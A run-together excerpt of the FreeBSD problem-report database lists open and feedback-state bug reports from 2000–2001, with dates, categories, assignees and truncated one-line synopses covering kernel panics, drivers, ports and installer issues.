Sysinstall/disklabel: bad partition table o [2000/02/23] ports/16955 markm 'pgp5' built with ports/security/pgp5 doe o [2000/02/25] ports/16983 ache procmail port not prefix clean o [2000/02/25] misc/16991 jhb booting install disk and USB o [2000/02/28] bin/17056 rshd does improper home directory check o [2000/03/01] misc/17108 SecureRPC not supported in mount_nfs comm o [2000/03/01] conf/17117 Dial-up problems when using Kppp o [2000/03/02] bin/17134 problem with 3.0-RELEASE cron forgetting o [2000/03/03] kern/17142 4.0-CURRENT hangs in ex_isa_identify() wh o [2000/03/03] kern/17153 mjacob Qlogic Ultra3 cards seem to write very sl o [2000/03/05] kern/17208 3.4 Lock-up during file-completion o [2000/03/06] i386/17228 Installation floppies hang up on Compaq A o [2000/03/06] misc/17235 endless loop? harddrive corrupted? o [2000/03/06] ports/17237 hosokawa in samba suite smbclient -M worked incorr o [2000/03/10] misc/17310 wpaul NIS host name resolving may loop forever o [2000/03/11] ports/17313 ache wu-ftpd ports install invalid file owners o [2000/03/11] ports/17314 hosokawa in samba: testparm incorrectly generate w o [2000/03/12] bin/17338 netstat shows down counting UDP delivery o [2000/03/12] i386/17346 APIC cannot be enabled without turning on o [2000/03/13] bin/17360 green [PATCH] Cleanup bug in pam_ssh o [2000/03/14] i386/17374 Archive QIC02 tape-unit device randomly h o [2000/03/15] kern/17393 kldload syscall allows the same kernel mo f [2000/03/16] kern/17403 cg CS4232 wont play w/newpcm o [2000/03/16] conf/17406 nis in /etc/host.conf breaks network prog o [2000/03/16] kern/17422 bde 4.0-STABLE: top: nlist failed o [2000/03/17] gnu/17433 libobjc locks mutex before deallocating i o [2000/03/18] bin/17482 ftpd(8) forget to close TCP port in passi o [2000/03/18] kern/17483 Cannot run disklabel on virgin disk o [2000/03/19] kern/17494 Two problems with the tun device o [2000/03/20] kern/17504 ken Another Micropolis Synchronize Cache Prob f [2000/03/20] misc/17517 wpaul 100/10baseT card resets under load o [2000/03/21] conf/17540 NIS host lookups cause NFS mounts to wedg o [2000/03/21] kern/17542 cg random static with GUS PnP o [2000/03/22] misc/17562 PAS16 sound cycles o [2000/03/24] kern/17583 julian NETATALK code can corrupt mbuf free lists o [2000/03/24] misc/17584 groudier fatal SCSI error with a Symbios 53c875 co o [2000/03/26] kern/17613 impossible to build FS KLD without kernel o [2000/03/27] i386/17626 green sshd cores when I scp to it o [2000/03/28] kern/17634 Non-deterministic PnP sound device config o [2000/03/28] kern/17636 FreeBSD 4 uses network card driver dc whe s [2000/03/28] alpha/17637 billf misconfigured syscons bell causes panic o o [2000/03/29] i386/17662 gibbs cam_xpt.c incorrectly disables tagged que o [2000/03/29] kern/17680 Multiple crashes due to load in 4.0/5.0 e o [2000/03/30] kern/17695 cg Vibra16X sound card doesn't record audio o [2000/03/30] kern/17697 Boot floppy+local ftp upgrade from 3.4/in o [2000/03/31] i386/17713 gibbs MAKEDEV and /stand/sysinstall goofups wit o [2000/04/01] kern/17738 reboot after panic: softdep_lock: locking o [2000/04/02] i386/17755 FTP install of 4.0 allocates too few inod o [2000/04/02] i386/17761 disk label editor in 4.0 deleted 3.4 part o [2000/04/04] i386/17800 bde [PATCH] problem with statclock initializa o [2000/04/06] kern/17829 The dc driver is seriously broken o [2000/04/07] bin/17841 ttyp0 (and only 0!) produces stdout input o [2000/04/07] kern/17842 Erratic user time reports for long runnin o [2000/04/07] bin/17843 ftpd fails to set cwd with mode 700 NFS m o [2000/04/07] kern/17844 Amd wedges every morning since I've upgra o [2000/04/08] kern/17863 Running DAP reboots computer o [2000/04/08] kern/17871 starting to accumulate undeletable direct o [2000/04/09] i386/17883 4.0-RELEASE panics during install. o [2000/04/10] kern/17895 stale unix domain connections o [2000/04/10] kern/17905 dillon 4.0-SNAP keep on crashing every 3 days o [2000/04/10] i386/17915 pcm0 direct DMA issues. o [2000/04/11] i386/17926 yokota psm device problems with apm resume o [2000/04/11] i386/17930 wpaul Patch to MFC WaveLAN WEP into 3.4-STABLE o [2000/04/11] kern/17936 panic: resource_list_alloc: resource entr o [2000/04/11] i386/17940 Cannot recongize the scsi card AIC-7899 o [2000/04/12] kern/17961 n_hibma Fatal Trap 12. Page fault while in kernel o [2000/04/12] kern/17965 wpaul vr (MII-bus version in 4.0 ONLY) driver l o [2000/04/14] kern/18012 adrian vnode_free_list corruption, "free vnode i o [2000/04/15] kern/18024 when printing through gs: panic: lockmgr: o [2000/04/17] misc/18065 mdodd FREEBSD 4.0 crashes on boot Compaq Prolia o [2000/04/19] i386/18089 4.0R install hangs on newfs or fsck o [2000/04/20] kern/18110 DC-390 SCSI BIOS setting no effect and IB o [2000/04/21] i386/18132 BTX dumps trying to boot w/ dedicated SCS o [2000/04/22] bin/18160 pppd does not hang up sometimes while sta o [2000/04/23] ports/18180 jmz xdm authorization fails with XDM-AUTHORIZ o [2000/04/23] bin/18181 Getty can fail to observe :de: specificat f [2000/04/23] i386/18185 gibbs Adaptec 3950U2 errors during boot/probe o [2000/04/24] kern/18200 mdodd 3com 3c509b recognized twice during boot f [2000/04/25] kern/18209 green rlimits are never checked in exec() if ex o [2000/04/28] i386/18268 RTC BIOS error10 (memorysize) o [2000/04/28] kern/18285 the system froze when use scon -s 50 o [2000/04/30] kern/18315 System hang when doing back-to-back captu o [2000/04/30] kern/18316 close-together bt848/878 captures to file o [2000/05/02] kern/18345 cg sbc / pcm not fully recognizing AWE64 o [2000/05/02] kern/18348 yokota ::c_str() o [2000/05/19] bin/18678 Bug in libz o [2000/05/19] kern/18687 mrouted and IPDIVERT cause a panic o [2000/05/20] kern/18704 GLOB_ERR not handled correctly by glob() o [2000/05/22] bin/18742 times.allow field parsed incorrectly o [2000/05/22] kern/18757 dg [PATCH] fxp driver doesn't enable flow co o [2000/05/22] kern/18763 kernel crashes when sysctl(3) is called o [2000/05/22] alpha/18768 wpaul Digital DE500-BA with "dc" driver doesn't o [2000/05/29] kern/18875 arpintr() problem o [2000/05/30] kern/18899 if_vr.c can't bridging properly when bpf o [2000/05/30] bin/18903 pkg_add deleted its own database o [2000/05/31] kern/18924 sysctl hw.bt848 crashes machine (bktr dri o [2000/05/31] conf/18925 No X Desktop Environments in 4.0 o [2000/05/31] kern/18932 Total loss of ethernet needing reboot. P o [2000/06/01] i386/18940 Reading from stdin using linux-jdk-1.2.2 o [2000/06/05] kern/19020 kernel reboots sometimes o [2000/06/05] misc/19025 Installer assumes /dev exists if target d o [2000/06/07] ports/19093 obrien problem with mail/muttzilla o [2000/06/08] kern/19121 IPv4 multicast does not work without rout o [2000/06/08] misc/19125 Undefined symbol `_poll' referenced from o [2000/06/12] bin/19231 quota/mount commands inconsistency o [2000/06/13] ports/19238 will sgmltools1 o [2000/06/13] i386/19245 -fexpensive-optimizations buggy (even wit o [2000/06/14] kern/19256 in devicedriver cy.c make_dev (..) probl o [2000/06/14] ports/19281 billf Error in ucd-snmp port with tkmib o [2000/06/16] kern/19347 top, CPU and SMP-problem in new kernel o [2000/06/17] bin/19357 swap info incorrect after using sysinstal o [2000/06/18] kern/19363 Do allow processes know about their file o [2000/06/19] bin/19375 makekey accepts only 8-byte password o [2000/06/19] misc/19376 ncurses alters buffering of stdin/stdout o [2000/06/19] kern/19389 Panic caused by sendfile(2) o [2000/06/19] bin/19393 programs using strftime () dump core if R o [2000/06/20] kern/19402 Signals 127 and 128 cannot be detected in o [2000/06/20] bin/19405 telnetd sends DO AUTHENTICATION even if a o [2000/06/23] conf/19461 X authentication doesn't work off the CD o [2000/06/23] kern/19465 SYNC_CHACHE PROBREM: NEWTECH NDA20128A o [2000/06/23] kern/19479 processes stuck in 'ffsvgt' and 'FFS no' o [2000/06/23] kern/19482 Upgrade from 4.0-RELEASE to 4.0-STABLE ca o [2000/06/25] kern/19499 EtherExpress 16 is not probed o [2000/06/25] i386/19508 pci bus not probed for pci ethernet card o [2000/06/27] conf/19542 Problem with Proxy o [2000/06/28] conf/19569 stock IPFW rules have subtle udp hole o [2000/06/30] kern/19603 luigi 20 ethernet interfaces not compatible wit o [2000/06/30] docs/19604 steve Web query interface doesn't search or Ori o [2000/07/02] kern/19654 wpaul 20 dc ports in one machine (5x 4port card o [2000/07/03] i386/19662 kernel panic after too many socket freed o [2000/07/03] kern/19672 dillon contigmalloc1() oddity for large alignmen o [2000/07/03] misc/19673 dhclient-script will not always set the h o [2000/07/05] ports/19711 portmgr bsd.port.mk and autoconf are conflict o [2000/07/05] kern/19714 dillon swap_pager_getswapspace: failed o [2000/07/06] i386/19737 Cannot build a profiled kernel; load fail o [2000/07/07] bin/19773 [PATCH] telnet infinite loop depending on o [2000/07/09] kern/19814 marcel Oracle8i installer triggers problem in th o [2000/07/10] i386/19820 Installation of Lotus Notes 5.0 for Linux o [2000/07/12] kern/19875 A new protocol family, PF_IPOPTION, to ha o [2000/07/12] kern/19880 Problem with configuring RS-232 multiport o [2000/07/13] misc/19909 dillon Problem with NFS client in 4.0-STABLE o [2000/07/15] bin/19946 alex possible bug in sh(1) with -p flag (privi o [2000/07/15] misc/19951 jmz moused has problems with XFree86 o [2000/07/17] misc/19994 sscanf() fails on 64-bit operations o [2000/07/18] kern/20016 jasone pthreads: Cannot set scheduling timer/Can o [2000/07/18] docs/20028 doc ASCII docs should reflect tags o [2000/07/19] kern/20040 msmith Toshiba 2775 hangs after pcib0 driver is o [2000/07/22] kern/20115 cg pcm0 doesnot work on Panasonic Let's note o [2000/07/25] misc/20172 byacc 1.9 fails to generate $default tran o [2000/07/26] bin/20194 amd doesn't provide directories automatic o [2000/07/27] kern/20213 NFS and Linuxulator issues in PR kern/194 o [2000/07/27] kern/20217 darrenr IPF default block and inclusion in rc.net o [2000/07/27] bin/20220 unable to Ctrl-C (quit) when using "more" o [2000/07/27] kern/20234 green panic(): lockmgr: pid 259, not exclusive o [2000/07/28] bin/20259 des fetch(1) confused when redirected from ht o [2000/07/29] conf/20282 murray sysinstall does not recover some /etc fil f [2000/07/31] kern/20335 yokota S3Trio64V+ is detected as CGA by syscons a [2000/08/02] bin/20373 obrien Setting breakpoints in shared objects bro o [2000/08/08] ports/20490 tg Termios timeout parameters, VMIN, VTIME, f [2000/08/09] i386/20507 yokota Mouse freezes in 4.0-release after some u o [2000/08/10] kern/20523 Support for PCI multiport cards for sio d o [2000/08/13] kern/20572 marcel cannot safely remove COMPAT_43 from the k o [2000/08/14] bin/20591 src/usr.bin/file/MAINT & README & file.1 o [2000/08/14] kern/20609 dillon panic: vm_fault: fault on nofault entry, o [2000/08/15] kern/20619 arpintr o [2000/08/15] kern/20631 kernel panics on ifconfig if_le f [2000/08/15] kern/20632 stacking mount_null causes an error: moun o [2000/08/15] bin/20633 fdisk doesn't handle LBA correctly o [2000/08/16] bin/20646 dwmalone [PATCH] /bin/cp -p whines on set[ug]id im f [2000/08/17] i386/20685 fbsd 4.1-stable crashed when compiling st f [2000/08/17] kern/20689 groudier Newbusified version of ncr driver does no o [2000/08/18] kern/20708 imp Adaptec 1542 ISA SCSI Controller not dete o [2000/08/20] bin/20725 Raw floppy writes fail for partial bytes. o [2000/08/20] kern/20734 n_hibma USB mouse detaches and never reataches f [2000/08/22] bin/20779 assar junk pointer error causes kpasswd to fail o [2000/08/24] ports/20831 torstenb Autoconf Port: Bug introduced by patch-ag o [2000/08/25] gnu/20835 markm Errno.pm is lost in perl system o [2000/08/26] misc/20861 jasone libc_r does not honor socket timeouts o [2000/08/28] gnu/20912 obrien gdb does not recognise old executables. o [2000/08/30] bin/20952 ftpd doesn't honor account expiration tim o [2000/08/31] kern/20958 mdodd ep0 lockup with ifconfig showing OACTIVE o [2000/09/01] ports/20986 reg Mozilla M17 installs incorrectly o [2000/09/06] i386/21087 tanimura ed driver incorrectly fails probe for ISA o [2000/09/07] misc/21089 vi silently corrupt open file on SIGINT w o [2000/09/08] kern/21118 luigi Multiple problems in ipfw's stateful code f [2000/09/08] ports/21126 ports httpd warnings regarding attempts to free o [2000/09/08] kern/21131 Floppy causing cold boot in -STABLE o [2000/09/08] kern/21132 setting kern.hostid to 2887705710 fails. o [2000/09/08] bin/21133 sail driver dies f [2000/09/08] kern/21139 ken IBM DNES drives need 'quirk table' entry. o [2000/09/09] kern/21143 `#define schedsofttty' et al. should not o [2000/09/09] ports/21146 green [patch] openssh with LOGIN_CAP don't setu o [2000/09/09] bin/21152 @monthly entry in crontab is run every da o [2000/09/09] kern/21155 Load average (either with uptime both top o [2000/09/10] kern/21162 panic in ffs_softdep.c: handle_workitem_f o [2000/09/11] bin/21208 tar does not support 2.5 GB file o [2000/09/11] kern/21209 groudier scsi ncr driver installs instead of scsi o [2000/09/11] ports/21210 dima acroread port missing lib a [2000/09/13] bin/21248 kris openssl dumps core with blank passwords o [2000/09/13] bin/21251 NIS problem - ypbind does loop in CLNT_BR o [2000/09/14] gnu/21260 buffer overrun in uux o [2000/09/14] ports/21264 markm tn3270 port receives segmentation fault o [2000/09/14] kern/21270 Kernel compilation errors and dies when c o [2000/09/14] gnu/21276 libI77 is unable to handle files >2Gbytes o [2000/09/15] bin/21292 ifconfig warn but does duplicate IP addre o [2000/09/15] i386/21297 kernel panic TRAP 18 during kern.flp inst o [2000/09/15] misc/21300 Install CD-ROMs don't give users enough r o [2000/09/15] kern/21304 wpaul dc0 watchdog timeouts on NetGear FA310TX o [2000/09/15] kern/21305 roger bktr driver dosn't send signals in contin o [2000/09/17] misc/21328 Should newer version of OS-BS be on CDROM o [2000/09/18] misc/21384 pcm driver has static in recorded audio o [2000/09/19] misc/21406 freebsd's bootinst or booteasy overwrites o [2000/09/20] kern/21424 Blocking issue while regenerating aliases o [2000/09/20] kern/21429 box reboots with panic: pipeinit: cannot o [2000/09/20] gnu/21433 obrien g++ optimiser produces bad code on right o [2000/09/21] kern/21461 ISA PnP resource allocator problem o [2000/09/21] kern/21463 marcel Linux compatability mode should not allow o [2000/09/21] ports/21464 marcel linux_base port installs insecure glibc r a [2000/09/25] conf/21540 bp installworld panics for diskless clients o [2000/09/25] ports/21548 kbyanc libcoro.a (ports) should use MAP_STACK wh o [2000/09/26] i386/21559 rnordier BTX loader sometime show registers o [2000/09/27] conf/21593 Whither cons25, or, cons25 causing intero f [2000/09/27] bin/21603 green Can't change user passwords on 4.1.1-STAB o [2000/09/28] i386/21624 trap in gusc_attach o [2000/09/28] kern/21625 yokota kernel hangs if SC_NO_FONT_LOADING define o [2000/09/28] kern/21631 4.1.1 Release and Stable don't detect my o [2000/09/28] bin/21637 [telnet] No address associated with hostn o [2000/09/28] kern/21642 Compaq Netelligent 10/100 card (TI Thunde o [2000/09/29] kern/21653 I need a AD1816 Driver o [2000/09/29] bin/21654 Re: nvi's -c flag does no do what it is d o [2000/10/01] kern/21674 Fujitsu MO drives M2513A don't like the s o [2000/10/01] kern/21688 Kernel crash with Adaptec AAA-133 and ahc o [2000/10/02] misc/21701 murray Keymap selection menu broken on initial i o [2000/10/02] ports/21714 sobomax audio problem with nil o [2000/10/02] misc/21716 The site search results *suck*. o [2000/10/04] ports/21756 adrian errors in Squid-2.3.4's configure prevent o [2000/10/04] ports/21761 adrian Re: errors in Squid-2.3.4's configure pre o [2000/10/05] kern/21771 Fix for sppp and Cronyx drivers update o [2000/10/05] gnu/21779 patch(1)'s bug of new file creation o [2000/10/06] kern/21791 Hang on FIN_WAIT_2 a [2000/10/06] kern/21808 [patches] msdosfs incorrectly handles vno o [2000/10/07] i386/21824 bt driver no longer attaches due to chang o [2000/10/07] kern/21827 mount causes freebsd 4.1.1 to reboot o [2000/10/09] kern/21860 The fix to TCP_ISSINCR after the bugtraq o [2000/10/09] kern/21869 Compiling a a.out kernel on FreeBSD 4.0 o [2000/10/09] bin/21877 green [PATCH] DSA support for pam_ssh o [2000/10/10] kern/21898 If options NFS is not in the kernel, moun o [2000/10/11] bin/21918 Revision 1.5 provides incomplete fix for o [2000/10/12] misc/21940 Modem Power-Off kills system o [2000/10/12] kern/21946 vm_fault when (accidentally) attempted to o [2000/10/13] kern/21965 Running ldconfig (linux binary) from ld-1 o [2000/10/15] misc/21998 green ident only for outgoing connections o [2000/10/15] i386/22006 quotacheck halt s [2000/10/16] gnu/22025 markm perl does chmod in installworld o [2000/10/16] kern/22029 mckusick use of softdependencies leads to major fi o [2000/10/17] kern/22063 brian bpf when used with the select system call o [2000/10/18] bin/22105 /usr/src/bin/sh - Permission denied when o [2000/10/19] misc/22111 Install 4.1.1 o [2000/10/19] kern/22142 securelevel does not affect mount o [2000/10/21] kern/22200 4.1.1-RELEASE can't mount CDROMS (negativ o [2000/10/22] bin/22212 skeyaccess(3) doesn't for primary group o [2000/10/22] kern/22225 Trying to build a CURRENT snapshot on 4.1 o [2000/10/23] kern/22265 Suspend only possible once after reboot o [2000/10/24] misc/22283 when attempting to boot from CDROM to ins o [2000/10/24] misc/22284 Change (SunOS) NIS passwd error o [2000/10/25] bin/22286 marcel siglongjmp does not properly restore the o [2000/10/25] conf/22287 binary upgrade install to 4.1.1 does not o [2000/10/25] bin/22291 getcwd() fails on recently-modified NFS-m o [2000/10/26] i386/22315 Cannot reboot or power-off the machine o [2000/10/26] ports/22328 mi new port -- print/ttf2pt1 o [2000/10/29] ports/22403 portmgr "make readmes" hangs if category director o [2000/10/30] ports/22416 reg mozilla segfaults on current o [2000/10/30] kern/22417 gibbs advansys wide scsi driver does not suppor a [2000/10/30] ports/22421 ports New port: Enhydra 3.1 beta 1 o [2000/10/31] i386/22441 pmap_growkernel() is not effective at ker o [2000/10/31] kern/22460 PCMCIA card using ed driver temporarily f o [2000/11/01] bin/22482 The sysctl (8) command uses strtol on inp o [2000/11/01] bin/22489 mass IP aliasing via ifconfig broken o [2000/11/02] kern/22521 netgroup can't work on FreeBSD-4.1.1-STAB o [2000/11/02] kern/22532 [patch] /dev/dsp is sometimes busy when n o [2000/11/03] misc/22588 scp hangs when using Lucent 802.11b card f [2000/11/03] kern/22594 NFS can't handle asymmetric server routin o [2000/11/03] ports/22597 billf [PATCH] ports/net/ucd-snmp o [2000/11/04] i386/22606 Panic on boot: panic string "panic ahc0: o [2000/11/05] bin/22614 billf pam_ssh dumps core o [2000/11/05] kern/22624 Interrupt conflict btw. vga and Ethernet o [2000/11/06] gnu/22635 Why don't you use truncate(2) in libI77 o [2000/11/06] kern/22642 Load average stuck not changing o [2000/11/06] kern/22643 Cannot compile kernel with support for Gr o [2000/11/08] bin/22685 Repairing a directory hard link. o [2000/11/08] ports/22695 ports MAKEDEV has no entry for cfs0, the device o [2000/11/08] i386/22708 fpe in healthd when it starts o [2000/11/08] i386/22712 sysinstall makes wacky keymap choices o [2000/11/09] bin/22727 disklabel crashes if the number of partit o [2000/11/10] bin/22737 syslog gets spammed with /kernel: arp_rtr o [2000/11/12] ports/22802 jseger convert in ImageMagic does not work in co o [2000/11/13] kern/22826 marcel Memory limits have no effect in linux com o [2000/11/14] bin/22846 Routed does not reflect preference of Int o [2000/11/15] kern/22862 ncr probe fails with CACHE TEST FAILED: ? o [2000/11/15] kern/22866 Packets send on INET6 sockets compatible o [2000/11/15] kern/22874 cg newpcm CS461x sound problems o [2000/11/15] kern/22877 installation panic if ep0 presents o [2000/11/16] kern/22896 When kernel boots uhci fails o [2000/11/17] kern/22926 kernel 4.1-RELEASE, 4.1.1-RELEASE (floppy o [2000/11/18] kern/22942 Problem with ext2fs support o [2000/11/18] kern/22943 marcel Problem with linux emulation o [2000/11/18] i386/22944 isa_dmainit fails on machines with 512MB s [2000/11/18] bin/22945 tftp (4.1.1-RELEASE) appears broken a [2000/11/18] kern/22947 jon IBM 10/100 EtherJet Cardbus (Xircom X3201 o [2000/11/18] kern/22951 failed drive causes panic with HPT370 RAI o [2000/11/19] i386/22969 4.1.1 stable kernel cannot find console o [2000/11/20] ports/22977 ports kmp3 has a problem o [2000/11/20] conf/22998 darrenr ipf fails to load the rules if IPFILTER i o [2000/11/22] i386/23039 disklabel editor couldn't create partitio o [2000/11/23] ports/23041 jmz XFree86 4.0.1 crashes when switching to a o [2000/11/23] ports/23054 olgeni Re: maintainer update: security/nessus su o [2000/11/23] gnu/23058 ncurses: tgoto_internal() ugliness o [2000/11/24] alpha/23064 jkh Alphas do not boot if `a' (/) partition i o [2000/11/24] misc/23069 jkh Compat22 does not work until you reboot o [2000/11/24] ports/23080 jmz fr keymap don't work correctly o [2000/11/24] bin/23083 pkg_add returns 0 even if the package is o [2000/11/25] misc/23094 dd The PR system has no way to let committer o [2000/11/25] bin/23098 If installing on a serial console, enable o [2000/11/26] i386/23108 Boot defaults to wd(4) devices rather tha o [2000/11/26] misc/23120 '|more' takes up to 100% system resources f [2000/11/26] ports/23122 sobomax programs requiring glib13 fail in configu o [2000/11/26] ports/23125 ports Successful emulation of StarOffice depend o [2000/11/27] ports/23140 pst GNU id-utils port is out-of-date o [2000/11/28] misc/23161 tcsh execs /bin/ls --color 80 char. but u o [2001/02/14] kern/25093 4.2-STABLE does not recognize PCNet-ISA+ o [2001/02/14] ports/25102 ports depends on 'wrong' openldap o [2001/02/14] conf/25105 green S/Key support is broken in sshd o [2001/02/16] bin/25132 sigprocmask problem with pthread o [2001/02/16] kern/25136 Fatal trap 12: page fault while in kernel o [2001/02/16] bin/25153 kdump does not finish displaying data s [2001/02/16] ports/25155 ports `ASSERTION FAILED' errors with security/p a [2001/02/19] kern/25201 imp pccard event and syscons beep duration de o [2001/02/19] ports/25205 greid mail/pop3lite port update o [2001/02/19] kern/25213 Bus abstraction interface doesn't allow p o [2001/02/19] i386/25214 Installing 4.2, and after the initial set o [2001/02/20] i386/25236 Intel 82559 is not working behind a DEC/I o [2001/02/20] bin/25244 termcap and printcap interference o [2001/02/21] kern/25245 mounting NFS to/from same host + activity o [2001/02/21] kern/25248 bde sys/user.h needs sys/param.h, but doesn't o [2001/02/21] bin/25250 segfault on tar Ixvf o [2001/02/21] kern/25255 keyboard response very slow with PCMCIA E f [2001/02/21] kern/25261 gibbs ahc0 no active SCB errors when booting of a [2001/02/21] kern/25266 chris fdesc file system in -STABLE locks up dur o [2001/02/21] ports/25272 rse Using eperl as cgi/nph binary executor ca o [2001/02/23] bin/25337 rwatson dmesg -a should be restricted o [2001/02/24] kern/25344 ipfilter and ppp insecure in 4.2-Stable o [2001/02/24] kern/25346 Some interrupts not delivered on Dell Wor o [2001/02/25] ports/25374 ports A new port math/atlas highly optimized BL o [2001/02/26] bin/25403 darrenr ipfilter: enable ipv6 and STATETOP in 4.2 o [2001/02/26] misc/25404 sys/cdefs.h does not contain definitions o [2001/02/27] kern/25421 jesper route structures are being leaked. o [2001/02/28] bin/25461 jkh sysinstall's fdisk and disklabel don't wo o [2001/02/28] kern/25464 if_xl.so kld does not work with "options o [2001/03/01] kern/25476 [PATCH] The syscall oldgetkerninfo can re o [2001/03/02] ports/25492 ports patche of CLISP o [2001/03/03] kern/25511 ioctl(fd, FIONREAD, &c) on a FIFO (not PI o [2001/03/04] ports/25522 portmgr FORBIDDEN ports doesn't return error for o [2001/03/05] bin/25542 /bin/sh: null char in quoted string o [2001/03/05] bin/25561 [PATCH] ksrvtgt contains unsubstituted pa o [2001/03/07] misc/25585 sed.test 8.16 puts bugged sed into infini o [2001/03/07] bin/25586 green Password expiration doesn't work after up o [2001/03/07] kern/25592 Route table appears to fill up, and conne o [2001/03/09] kern/25640 DLink DFE-530TX+ cards are not recognized o [2001/03/10] kern/25650 le nic driver causes kernel panic f [2001/03/10] conf/25676 FBSD >= 4.0 does not recongnize NIC card o [2001/03/11] i386/25693 VGA driver on Current not found o [2001/03/11] misc/25694 change passwd on SunOS yp server f [2001/03/11] ports/25718 ports Missing xmkmf in XFree86-4.0.1,fix this b o [2001/03/12] kern/25755 cg kernel hangs when loading emu10k1 sound d o [2001/03/13] kern/25781 Statclocks cannot be disables on ServerWo o [2001/03/14] misc/25801 imp change IP-address on pccard (3Com) fails o [2001/03/15] bin/25826 nfsd -t -h adr1 -h adr2 doesn't work o [2001/03/16] misc/25851 sysinstallSecurity hole in anonymous FTP setup scri o [2001/03/17] bin/25885 telnet -a off still uses SRA authenticati o [2001/03/17] bin/25886 cgetset(3) doesn't get cleared when switc o [2001/03/18] i386/25889 FDISK lost a partition ! o [2001/03/18] misc/25899 As I have NAS storgae more than 1.2 TB wi f [2001/03/18] kern/25900 system crach and reboot when use mount_cd o [2001/03/19] bin/25929 Can't use MAKEDEV in fixit mount o [2001/03/20] kern/25949 msmith camcontrol doesn't find new drives or RAI o [2001/03/20] kern/25953 sos Attempt to access CD changer results in p o [2001/03/20] ports/25958 jmz Xfree86's savage and vesa drivers can pan o [2001/03/20] kern/25959 pcn driver disables nic after kernel is l o [2001/03/21] i386/25968 /usr/src/lib/libcrypt/../libutil/property o [2001/03/22] kern/25986 Socket would hang at LAST_ACK forever. f [2001/03/22] kern/25992 System hangs when read-only floppy has be o [2001/03/22] misc/26002 n_hibma Poor read/write performance on uhci USB c a [2001/03/22] bin/26010 ache tar(1) core-dumps on '-I file' o [2001/03/22] kern/26013 Linksys (rev 3) USB 100TX NIC causes infi o [2001/03/23] ports/26036 dima acroread4 produces invalid postscript in o [2001/03/23] misc/26044 vsprintf calls __swsetup, then __smakebuf o [2001/03/25] kern/26078 Jails cannot connect to the main server a o [2001/03/26] bin/26093 markm pam_unix rejects authenticating accounts o [2001/03/26] ports/26114 bmah [PATCH] pkg_version support for wildchart o [2001/03/26] misc/26132 keyboard hangs during install from the cd o [2001/03/27] kern/26142 Unlink fails on NFS mounted filesystem o [2001/03/27] kern/26161 Kernel Panic on Dual Processor System dur o [2001/03/28] kern/26171 not work Linux-emulator, but hi is work i o [2001/03/28] misc/26185 4.2-R kern.flp won't boot on PS/2 o [2001/03/29] conf/26203 No CODA devices in MAKEDEV o [2001/03/29] ports/26207 ports Selecting KDE in sysinstall as GUI env do f [2001/03/29] bin/26209 imp pccardd will not recognise any pc cards o o [2001/03/30] i386/26216 alloca() couldn't detect thread stack lim o [2001/03/30] ports/26237 ache Apache 1.3.19 segfaulting in ap_get_local o [2001/03/31] i386/26261 silo overflow problem in sio driver o [2001/03/31] ports/26262 ports jgnat is broken o [2001/04/01] conf/26275 darrenr ipfilter_enable in rc.conf does not load o [2001/04/02] kern/26304 pcm only plays left channel in FreeBSD 4. o [2001/04/02] bin/26307 libc_r aborts when using the KDE media pl o [2001/04/03] kern/26309 PPPoE client panics in kernel - fxp probl o [2001/04/03] misc/26320 mountd breaks IRIX automounter o [2001/04/04] i386/26344 3Com 3C509 EtherLink III Problem. o [2001/04/04] misc/26356 Large copy of files to the machine causes o [2001/04/04] kern/26361 5.0-04022001-CURRENT kernel panic on kern f [2001/04/05] gnu/26362 "cvs server" doesn't honour the global -- o [2001/04/06] i386/26382 FreeBSD Bootable CDROM won't boot on IBM o [2001/04/06] kern/26384 dc driver hangs in dc_rxeof o [2001/04/08] bin/26426 vi o [2001/04/08] kern/26430 cg -CURRENT panics on cat /dev/dsp or cat /d o [2001/04/09] ports/26464 ports Citrix client no longer reads files in lo o [2001/04/09] kern/26466 devfs panics o [2001/04/10] misc/26486 setnetgrent hangs when netgroup contains o [2001/04/11] kern/26501 imp Unsuported PCCARD freeze the kernel in is o [2001/04/12] kern/26506 sendto() syscall returns EINVAL in jail e o [2001/04/14] kern/26567 Mouse driver will not properly restart if o [2001/04/14] kern/26568 Mouse driver will die if you move mouse a o [2001/04/15] ports/26607 adrian squid port don't work corretly when compi o [2001/04/16] kern/26613 ethernet vr0 hangs f [2001/04/18] ports/26679 sobomax make on qpopper4 fails because it's using o [2001/04/19] kern/26704 AHA-2940[UW] gives MPARERR on cold boot ( f [2001/04/21] ports/26751 ports gnucash from FreeBSD package doesn't seem o [2001/04/22] gnu/26771 cvs checkout bug with existing val-tags a o [2001/04/23] ports/26797 assar arla-0.34.6 causes kernel panic/page faul o [2001/04/23] bin/26809 /etc not saved on upgrade o [2001/04/24] ports/26815 ports fix a fetch problem o [2001/04/25] bin/26842 dump with h flag takes a very long time o [2001/04/25] ports/26848 sobomax jre port core dumps o [2001/04/25] bin/26869 vi(1) crashes in viewing a file with long o [2001/04/26] kern/26877 cg loading snd_emu10k1 module causes lockup o [2001/04/26] kern/26878 Kernel panic in nfs subststem (vrele: neg o [2001/04/26] kern/26880 Unexpected busfree err w/ Adaptec 19160 a o [2001/04/27] ports/26891 ports Star Office 5.2 doesn't run after install o [2001/04/27] ports/26894 ports omniORB 3.0.3 servers die when using Free o [2001/04/27] kern/26896 Kernel panic during ktrace (vrele: negati o [2001/04/27] misc/26897 jkh 4.3R sysinstall fails to create swap part o [2001/04/27] i386/26903 jkh Cannot use DHCP from /stand/sysinstall ne o [2001/04/27] ports/26909 chuckr a2ps cannot handle long hostnames o [2001/04/28] ports/26912 jmz XFree86-4 packing list is fubar o [2001/04/28] kern/26920 imp PCI autoconfiguration of USB, dc ether, a o [2001/04/28] bin/26924 jkh sysinstall has problem parsing "dists=" f o [2001/04/28] misc/26933 jkh sysinstall - fdisk does not properly "dan o [2001/04/29] kern/26953 adter the installation is over it's make o [2001/04/29] ports/26961 clive update port: chinese/tin o [2001/04/30] i386/26985 jkh floppy install 4.3 via FTP hangs o [2001/04/30] bin/26996 green sshd fails when / mounted read-only o [2001/05/01] i386/27009 XFree86 4.0.3_3 fails to start on GeForce o [2001/05/01] bin/27016 ipnat should not require existence of ipf o [2001/05/01] kern/27020 FreeBSD 4.3RC compiled with an SMP kernel o [2001/05/02] kern/27044 remounting a r/w filesystem read-only cau o [2001/05/02] ports/27052 reg libtool port broken in 4.3 RELEASE o [2001/05/03] ports/27056 will kscd installed by x11/kde2 crashes on XFr o [2001/05/04] ports/27073 ports devel/jakarta-ant doesn't work out of the o [2001/05/04] bin/27080 sshd may mis-parse the authorized_keys fi o [2001/05/04] bin/27086 green OpenSSH does not set X11 forwarding o [2001/05/04] kern/27087 FreeBSD 